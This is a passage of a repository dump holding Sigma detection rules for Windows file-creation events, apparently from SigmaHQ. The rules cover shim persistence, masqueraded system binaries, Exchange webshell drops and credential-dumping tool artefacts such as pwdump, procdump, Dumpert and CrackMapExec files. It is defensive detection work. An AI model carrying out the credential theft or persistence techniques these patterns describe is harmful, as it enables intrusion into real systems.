    "content": "title: New Custom Shim Database Created\nid: ee63c85c-6d51-4d12-ad09-04e25877a947\nstatus: test\ndescription: |\n    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\n    The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory\n    - https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence\n    - https://liberty-shell.com/sec/2020/02/25/shim-persistence/\n    - https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-12-29\nmodified: 2023-12-06\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.009\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|contains:\n            - ':\\Windows\\apppatch\\Custom\\'\n            - ':\\Windows\\apppatch\\CustomSDB\\'\n    condition: selection\nfalsepositives:\n    - Legitimate custom SHIM installations will also trigger this rule\nlevel: medium\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_creation_new_shim_database/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_creation_scr_binary_file.yml",
    "content": "title: Suspicious Screensaver Binary File Creation\nid: 97aa2e88-555c-450d-85a6-229bcd87efb8\nstatus: test\ndescription: |\n    Adversaries may establish persistence by executing malicious content triggered by user inactivity.\n    Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md\nauthor: frack113\ndate: 2021-12-29\nmodified: 2022-11-08\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1546.002\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '.scr'\n    filter_generic:\n        Image|endswith:\n            - '\\Kindle.exe'\n            - '\\Bin\\ccSvcHst.exe' # Symantec Endpoint Protection\n    filter_tiworker:\n        # ParentCommandLine: C:\\WINDOWS\\system32\\svchost.exe -k DcomLaunch -p\n        Image|endswith: '\\TiWorker.exe'\n        TargetFilename|endswith: '\\uwfservicingscr.scr'\n    condition: selection and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_creation_system_dll_files.yml",
    "content": "title: Files With System DLL Name In Unsuspected Locations\nid: 13c02350-4177-4e45-ac17-cf7ca628ff5e\nstatus: test\ndescription: |\n    Detects the creation of a file with the \".dll\" extension that has the name of a System DLL in uncommon or unsuspected locations. (Outisde of \"System32\", \"SysWOW64\", etc.).\n    It is highly recommended to perform an initial baseline before using this rule in production.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-06-24\ntags:\n    - attack.defense-evasion\n    - attack.t1036.005\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith:\n            # Note: Add more System DLL that can be abused for DLL sideloading to increase coverage\n            - '\\secur32.dll'\n            - '\\tdh.dll'\n    filter_main_generic:\n        # Note: It is recommended to use a more robust filter instead of this generic one, to avoid false negatives.\n        TargetFilename|contains:\n            # - '\\SystemRoot\\System32\\'\n            - 'C:\\$WINDOWS.~BT\\'\n            - 'C:\\$WinREAgent\\'\n            - 'C:\\Windows\\SoftwareDistribution\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n            - 'C:\\Windows\\uus\\'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Third party software might bundle specific versions of system DLLs.\n# Note: Upgrade to high after an initial baseline to your environement.\nlevel: medium\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_creation_system_dll_files/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_creation_system_file.yml",
    "content": "title: Files With System Process Name In Unsuspected Locations\nid: d5866ddf-ce8f-4aea-b28e-d96485a20d3d\nstatus: test\ndescription: |\n    Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.).\n    It is highly recommended to perform an initial baseline before using this rule in production.\nreferences:\n    - Internal Research\nauthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems)\ndate: 2020-05-26\nmodified: 2026-02-04\ntags:\n    - attack.defense-evasion\n    - attack.t1036.005\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith:\n            - '\\AtBroker.exe'\n            - '\\audiodg.exe'\n            - '\\backgroundTaskHost.exe'\n            - '\\bcdedit.exe'\n            - '\\bitsadmin.exe'\n            - '\\cmdl32.exe'\n            - '\\cmstp.exe'\n            - '\\conhost.exe'\n            - '\\csrss.exe'\n            - '\\dasHost.exe'\n            - '\\dfrgui.exe'\n            - '\\dllhost.exe'\n            - '\\dwm.exe'\n            - '\\eventcreate.exe'\n            - '\\eventvwr.exe'\n            - '\\explorer.exe'\n            - '\\extrac32.exe'\n            - '\\fontdrvhost.exe'\n            - '\\fsquirt.exe' # was seen used by sidewinder APT - https://securelist.com/sidewinder-apt/114089/\n            - '\\ipconfig.exe'\n            - '\\iscsicli.exe'\n            - '\\iscsicpl.exe'\n            - '\\logman.exe'\n            - '\\LogonUI.exe'\n            - '\\LsaIso.exe'\n            - '\\lsass.exe'\n            - '\\lsm.exe'\n            - '\\msiexec.exe'\n            - '\\msinfo32.exe'\n            - '\\mstsc.exe'\n            - '\\nbtstat.exe'\n            - '\\odbcconf.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\regini.exe'\n            - '\\regsvr32.exe'\n            - '\\rundll32.exe'\n            - '\\RuntimeBroker.exe'\n            - '\\schtasks.exe'\n            - '\\SearchFilterHost.exe'\n            - '\\SearchIndexer.exe'\n            - '\\SearchProtocolHost.exe'\n            - '\\SecurityHealthService.exe'\n            - '\\SecurityHealthSystray.exe'\n            - '\\services.exe'\n            - '\\ShellAppRuntime.exe'\n            - '\\sihost.exe'\n            - '\\smartscreen.exe'\n            - '\\smss.exe'\n            - '\\spoolsv.exe'\n            - '\\svchost.exe'\n            - '\\SystemSettingsBroker.exe'\n            - '\\taskhost.exe'\n            - '\\taskhostw.exe'\n            - '\\Taskmgr.exe'\n            - '\\TiWorker.exe'\n            - '\\vssadmin.exe'\n            - '\\w32tm.exe'\n            - '\\WerFault.exe'\n            - '\\WerFaultSecure.exe'\n            - '\\wermgr.exe'\n            - '\\wevtutil.exe'\n            - '\\wininit.exe'\n            - '\\winlogon.exe'\n            - '\\winrshost.exe'\n            - '\\WinRTNetMUAHostServer.exe'\n            - '\\wlanext.exe'\n            - '\\wlrmdr.exe'\n            - '\\WmiPrvSE.exe'\n            - '\\wslhost.exe'\n            - '\\WSReset.exe'\n            - '\\WUDFHost.exe'\n            - '\\WWAHost.exe'\n    filter_main_generic:\n        # Note: It is recommended to use a more robust filter instead of this generic one, to avoid false negatives.\n        TargetFilename|contains:\n            # - '\\SystemRoot\\System32\\'\n            - 'C:\\$WINDOWS.~BT\\'\n            - 'C:\\$WinREAgent\\'\n            - 'C:\\Windows\\SoftwareDistribution\\'\n            - 'C:\\Windows\\System32\\'\n            - 'C:\\Windows\\SysWOW64\\'\n            - 'C:\\Windows\\WinSxS\\'\n            - 'C:\\Windows\\uus\\'\n    filter_main_tiworker:\n        Image|endswith:\n            - '\\TiWorker.exe'\n            - '\\wuaucltcore.exe'\n        TargetFilename|startswith: 'C:\\Windows\\Temp\\'\n    filter_main_svchost:\n        Image|endswith:\n            - 'C:\\Windows\\system32\\svchost.exe'\n            - 'C:\\Windows\\SysWOW64\\svchost.exe'\n        TargetFilename|contains:\n            - 'C:\\Program Files\\WindowsApps\\'\n            - 'C:\\Program Files (x86)\\WindowsApps\\'\n            - '\\AppData\\Local\\Microsoft\\WindowsApps\\'\n    filter_main_wuauclt:\n        Image:\n            - 'C:\\Windows\\System32\\wuauclt.exe'\n            - 'C:\\Windows\\SysWOW64\\wuauclt.exe'\n            - 'C:\\Windows\\UUS\\arm64\\wuaucltcore.exe'\n    filter_main_explorer:\n        TargetFilename|endswith: 'C:\\Windows\\explorer.exe'\n    filter_main_msiexec:\n        # This filter handles system processes who are updated/installed using misexec.\n        Image|endswith:\n            - 'C:\\WINDOWS\\system32\\msiexec.exe'\n            - 'C:\\WINDOWS\\SysWOW64\\msiexec.exe'\n        # Add more processes if you find them or simply filter msiexec on its own. If the list grows big\n        TargetFilename|startswith:\n            - 'C:\\Program Files\\PowerShell\\7\\pwsh.exe'\n            - 'C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe'\n            - 'C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview\\'\n    filter_main_healtray:\n        TargetFilename|contains: 'C:\\Windows\\System32\\SecurityHealth\\'\n        TargetFilename|endswith: '\\SecurityHealthSystray.exe'\n        Image|endswith: '\\SecurityHealthSetup.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - System processes copied outside their default folders for testing purposes\n    - Third party software naming their software with the same names as the processes mentioned here\n# Note: Upgrade to high after an initial baseline to your environement.\nlevel: medium\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_creation_system_file/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_creation_unquoted_service_path.yml",
    "content": "title: Creation Exe for Service with Unquoted Path\nid: 8c3c76ca-8f8b-4b1d-aaf3-81aebcd367c9\nstatus: test\ndescription: |\n    Adversaries may execute their own malicious payloads by hijacking vulnerable file path references.\n    Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md\nauthor: frack113\ndate: 2021-12-30\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.009\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        # Feel free to add more\n        TargetFilename: 'C:\\program.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files.yml",
    "content": "title: Cred Dump Tools Dropped Files\nid: 8fbf3271-1ef6-4e94-8210-03c2317947f6\nstatus: test\ndescription: Files with well-known filenames (parts of credential dump software or files produced by them) creation\nreferences:\n    - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment\nauthor: Teymur Kheirkhabarov, oscd.community\ndate: 2019-11-01\nmodified: 2025-10-25\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.t1003.002\n    - attack.t1003.003\n    - attack.t1003.004\n    - attack.t1003.005\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        - TargetFilename|contains:\n              - '\\fgdump-log'\n              - '\\kirbi'\n              - '\\pwdump'\n              - '\\pwhashes'\n              - '\\wce_ccache'\n              - '\\wce_krbtkts'\n        - TargetFilename|endswith:\n              - '\\cachedump.exe'\n              - '\\cachedump64.exe'\n              - '\\DumpExt.dll'\n              - '\\DumpSvc.exe'\n              - '\\Dumpy.exe'\n              - '\\fgexec.exe'\n              - '\\lsremora.dll'\n              - '\\lsremora64.dll'\n              - '\\NTDS.out'\n              - '\\procdump.exe'\n              - '\\procdump64.exe'\n              - '\\procdump64a.exe'\n              - '\\pstgdump.exe'\n              - '\\pwdump.exe'\n              - '\\SAM.out'\n              - '\\SECURITY.out'\n              - '\\servpw.exe'\n              - '\\servpw64.exe'\n              - '\\SYSTEM.out'\n              - '\\test.pwd'\n              - '\\wceaux.dll'\n    condition: selection\nfalsepositives:\n    - Legitimate Administrator using tool for password recovery\nlevel: high\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_cscript_wscript_dropper.yml",
    "content": "title: WScript or CScript Dropper - File\nid: 002bdb95-0cf1-46a6-9e08-d38c128a6127\nrelated:\n    - id: cea72823-df4d-4567-950c-0b579eaf0846\n      type: derived\nstatus: test\ndescription: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe\nreferences:\n    - WScript or CScript Dropper (cea72823-df4d-4567-950c-0b579eaf0846)\nauthor: Tim Shelton\ndate: 2022-01-10\nmodified: 2022-12-02\ntags:\n    - attack.execution\n    - attack.t1059.005\n    - attack.t1059.007\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\wscript.exe'\n            - '\\cscript.exe'\n        TargetFilename|startswith:\n            - 'C:\\Users\\'\n            - 'C:\\ProgramData'\n        TargetFilename|endswith:\n            - '.jse'\n            - '.vbe'\n            - '.js'\n            - '.vba'\n            - '.vbs'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_csexec_service.yml",
    "content": "title: CSExec Service File Creation\nid: f0e2b768-5220-47dd-b891-d57b96fc0ec1\nstatus: test\ndescription: Detects default CSExec service filename which indicates CSExec service installation and execution\nreferences:\n    - https://github.com/malcomvetter/CSExec\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-04\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\csexecsvc.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_csharp_compile_artefact.yml",
    "content": "title: Dynamic CSharp Compile Artefact\nid: e4a74e34-ecde-4aab-b2fb-9112dd01aed0\nstatus: test\ndescription: |\n    When C# is compiled dynamically, a .cmdline file will be created as a part of the process.\n    Certain processes are not typically observed compiling C# code, but can do so without touching disk.\n    This can be used to unpack a payload for execution\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.004/T1027.004.md#atomic-test-2---dynamic-c-compile\nauthor: frack113\ndate: 2022-01-09\nmodified: 2023-02-17\ntags:\n    - attack.defense-evasion\n    - attack.t1027.004\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '.cmdline'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_dcom_iertutil_dll_hijack.yml",
    "content": "title: Potential DCOM InternetExplorer.Application DLL Hijack\nid: 2f7979ae-f82b-45af-ac1d-2b10e93b0baa\nrelated:\n    - id: e554f142-5cf3-4e55-ace9-a1b59e0def65\n      type: obsolete\n    - id: f354eba5-623b-450f-b073-0b5b2773b6aa\n      type: similar\nstatus: test\ndescription: Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network\nreferences:\n    - https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html\nauthor: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga\ndate: 2020-10-12\nmodified: 2022-12-18\ntags:\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1021.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image: System\n        TargetFilename|endswith: '\\Internet Explorer\\iertutil.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_desktop_ini_created_by_uncommon_process.yml",
    "content": "title: Desktop.INI Created by Uncommon Process\nid: 81315b50-6b60-4d8f-9928-3466e1022515\nstatus: test\ndescription: Detects unusual processes accessing desktop.ini, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.\nreferences:\n    - https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/\nauthor: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO)\ndate: 2020-03-19\nmodified: 2025-12-09\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.009\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        TargetFilename|endswith: '\\desktop.ini'\n    filter_main_generic:\n        Image|startswith:\n            - 'C:\\Windows\\'\n            - 'C:\\Program Files\\'\n            - 'C:\\Program Files (x86)\\'\n    filter_main_upgrade:\n        TargetFilename|startswith: 'C:\\$WINDOWS.~BT\\NewOS\\'\n    filter_optional_jetbrains:\n        Image|startswith: 'C:\\Users\\'\n        Image|endswith: '\\AppData\\Local\\JetBrains\\Toolbox\\bin\\7z.exe'\n        TargetFilename|contains: '\\JetBrains\\apps\\'\n    filter_optional_onedrive:\n        Image|startswith: 'C:\\Users\\'\n        Image|contains: '\\AppData\\Local\\Microsoft\\OneDrive\\'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Operations performed through Windows SCCM or equivalent\n    - Read only access list authority\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml",
    "content": "title: DLL Search Order Hijackig Via Additional Space in Path\nid: b6f91281-20aa-446a-b986-38a92813a18f\nstatus: test\ndescription: |\n    Detects when an attacker create a similar folder structure to windows system folders such as (Windows, Program Files...)\n    but with a space in order to trick DLL load search order and perform a \"DLL Search Order Hijacking\" attack\nreferences:\n    - https://twitter.com/cyb3rops/status/1552932770464292864\n    - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\nauthor: frack113, Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-30\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1574.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith:\n            - 'C:\\Windows \\'\n            - 'C:\\Program Files \\'\n            - 'C:\\Program Files (x86) \\'\n        TargetFilename|endswith: '.dll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_dump_file_susp_creation.yml",
    "content": "title: Potentially Suspicious DMP/HDMP File Creation\nid: aba15bdd-657f-422a-bab3-ac2d2a0d6f1c\nrelated:\n    - id: 3a525307-d100-48ae-b3b9-0964699d7f97\n      type: similar\nstatus: test\ndescription: Detects the creation of a file with the \".dmp\"/\".hdmp\" extension by a shell or scripting application such as \"cmd\", \"powershell\", etc. Often created by software during a crash. Memory dumps can sometimes contain sensitive information such as credentials. It's best to determine the source of the crash.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-09-07\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - '\\cmd.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\powershell.exe'\n            - '\\pwsh.exe'\n            - '\\wscript.exe'\n        TargetFilename|endswith:\n            - '.dmp'\n            - '.dump'\n            - '.hdmp'\n    condition: selection\nfalsepositives:\n    - Some administrative PowerShell or VB scripts might have the ability to collect dumps and move them to other folders which might trigger a false positive.\nlevel: medium\nregression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_dump_file_susp_creation/info.yml\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_errorhandler_persistence.yml",
    "content": "title: Potential Persistence Attempt Via ErrorHandler.Cmd\nid: 15904280-565c-4b73-9303-3291f964e7f9\nstatus: test\ndescription: |\n    Detects creation of a file named \"ErrorHandler.cmd\" in the \"C:\\WINDOWS\\Setup\\Scripts\\\" directory which could be used as a method of persistence\n    The content of C:\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd is read whenever some tools under C:\\WINDOWS\\System32\\oobe\\ (e.g. Setup.exe) fail to run for any reason.\nreferences:\n    - https://www.hexacorn.com/blog/2022/01/16/beyond-good-ol-run-key-part-135/\n    - https://github.com/last-byte/PersistenceSniper\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-09\nmodified: 2022-12-19\ntags:\n    - attack.persistence\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: '\\WINDOWS\\Setup\\Scripts\\ErrorHandler.cmd'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_exchange_webshell_drop.yml",
    "content": "title: Suspicious ASPX File Drop by Exchange\nid: bd1212e5-78da-431e-95fa-c58e3237a8e6\nrelated:\n    - id: 6b269392-9eba-40b5-acb6-55c882b20ba6\n      type: similar\nstatus: test\ndescription: Detects suspicious file type dropped by an Exchange component in IIS into a suspicious folder\nreferences:\n    - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/\n    - https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html\n    - https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html\nauthor: Florian Roth (Nextron Systems), MSTI (query, idea)\ndate: 2022-10-01\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\w3wp.exe'\n        CommandLine|contains: 'MSExchange'\n        TargetFilename|contains:\n            - 'FrontEnd\\HttpProxy\\'           # from GTSC and MSTI reports\n            - '\\inetpub\\wwwroot\\aspnet_client\\' # from GTSC report\n    selection_types:\n        TargetFilename|endswith:\n            - '.aspx'\n            - '.asp'\n            - '.ashx'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_exchange_webshell_drop_suspicious.yml",
    "content": "title: Suspicious File Drop by Exchange\nid: 6b269392-9eba-40b5-acb6-55c882b20ba6\nrelated:\n    - id: bd1212e5-78da-431e-95fa-c58e3237a8e6\n      type: similar\nstatus: test\ndescription: Detects suspicious file type dropped by an Exchange component in IIS\nreferences:\n    - https://www.microsoft.com/security/blog/2022/09/30/analyzing-attacks-using-the-exchange-vulnerabilities-cve-2022-41040-and-cve-2022-41082/\n    - https://www.gteltsc.vn/blog/canh-bao-chien-dich-tan-cong-su-dung-lo-hong-zero-day-tren-microsoft-exchange-server-12714.html\n    - https://en.gteltsc.vn/blog/cap-nhat-nhe-ve-lo-hong-bao-mat-0day-microsoft-exchange-dang-duoc-su-dung-de-tan-cong-cac-to-chuc-tai-viet-nam-9685.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-10-04\ntags:\n    - attack.persistence\n    - attack.t1190\n    - attack.initial-access\n    - attack.t1505.003\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        Image|endswith: '\\w3wp.exe'\n        CommandLine|contains: 'MSExchange'\n    selection_types:\n        TargetFilename|endswith:\n            - '.aspx'\n            - '.asp'\n            - '.ashx'\n            - '.ps1'\n            - '.bat'\n            - '.exe'\n            - '.dll'\n            - '.vbs'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_gotoopener_artefact.yml",
    "content": "title: GoToAssist Temporary Installation Artefact\nid: 5d756aee-ad3e-4306-ad95-cb1abec48de2\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows\nauthor: frack113\ndate: 2022-02-13\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|contains: '\\AppData\\Local\\Temp\\LogMeInInc\\GoToAssist Remote Support Expert\\'\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_gup_uncommon_file_creation.yml",
    "content": "title: Uncommon File Created by Notepad++ Updater Gup.EXE\nid: 3b8f4c92-6a51-4d7e-9c3a-8e2d1f5a7b09\nstatus: experimental\ndescription: |\n    Detects when the Notepad++ updater (gup.exe) creates files in suspicious or uncommon locations.\n    This could indicate potential exploitation of the updater component to deliver unwanted malware or unwarranted files.\nreferences:\n    - https://notepad-plus-plus.org/news/v889-released/\n    - https://www.heise.de/en/news/Notepad-updater-installed-malware-11109726.html\n    - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/\n    - https://www.validin.com/blog/exploring_notepad_plus_plus_network_indicators/\n    - https://securelist.com/notepad-supply-chain-attack/118708/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-02-03\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1195.002\n    - attack.initial-access\n    - attack.t1557\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\gup.exe'\n    filter_main_legit_paths:\n        TargetFilename|startswith:\n            - 'C:\\Program Files\\Notepad++\\'\n            - 'C:\\Program Files (x86)\\Notepad++\\'\n    filter_main_temp_update_installer:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains|all:\n            - '\\AppData\\Local\\Temp\\'\n            - 'npp.'\n            - '.Installer.'\n            - '.exe'\n    filter_main_temp_generic_zip:\n        TargetFilename|startswith: 'C:\\Users\\'\n        TargetFilename|contains|all:\n            - '\\AppData\\Local\\Temp\\'\n            - '.zip'\n    filter_main_recycle_bin:\n        TargetFilename|startswith: 'C:\\$Recycle.Bin\\S-1-5-21'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Custom or portable Notepad++ installations in non-standard directories.\n    - Legitimate update processes creating temporary files in unexpected locations.\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_crackmapexec_indicators.yml",
    "content": "title: HackTool - CrackMapExec File Indicators\nid: 736ffa74-5f6f-44ca-94ef-1c0df4f51d2a\nrelated:\n    - id: 9433ff9c-5d3f-4269-99f8-95fc826ea489\n      type: obsolete\nstatus: test\ndescription: Detects file creation events with filename patterns used by CrackMapExec.\nreferences:\n    - https://github.com/byt3bl33d3r/CrackMapExec/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-03-11\nmodified: 2024-06-27\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection_path:\n        TargetFilename|startswith: 'C:\\Windows\\Temp\\' # The disk extension is hardcoded in the tool.\n    selection_names_str:\n        TargetFilename|endswith:\n            - '\\temp.ps1' # https://github.com/byt3bl33d3r/CrackMapExec/blob/3c3e412193cb6d3237abe90c543e5d995bfa4447/cme/modules/keepass_trigger.py#L42C41-L42C68\n            - '\\msol.ps1' # https://github.com/byt3bl33d3r/CrackMapExec/blob/3c3e412193cb6d3237abe90c543e5d995bfa4447/cme/modules/msol.py#L48C98-L48C106\n    selection_names_re:\n        - TargetFilename|re: '\\\\[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\\.txt$' # https://github.com/byt3bl33d3r/CrackMapExec/blob/3c3e412193cb6d3237abe90c543e5d995bfa4447/cme/protocols/wmi/wmiexec.py#L86\n        - TargetFilename|re: '\\\\[a-zA-Z]{8}\\.tmp$' # https://github.com/byt3bl33d3r/CrackMapExec/blob/3c3e412193cb6d3237abe90c543e5d995bfa4447/cme/protocols/smb/atexec.py#L145C19-L146\n    condition: selection_path and 1 of selection_names_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_dumpert.yml",
    "content": "title: HackTool - Dumpert Process Dumper Default File\nid: 93d94efc-d7ad-4161-ad7d-1638c4f908d8\nrelated:\n    - id: 2704ab9e-afe2-4854-a3b1-0c0706d03578\n      type: derived\nstatus: test\ndescription: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory\nreferences:\n    - https://github.com/outflanknl/Dumpert\n    - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-02-04\nmodified: 2023-05-09\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|endswith: 'dumpert.dmp'\n    condition: selection\nfalsepositives:\n    - Very unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/file/file_event/file_event_win_hktl_hivenightmare_file_exports.yml",
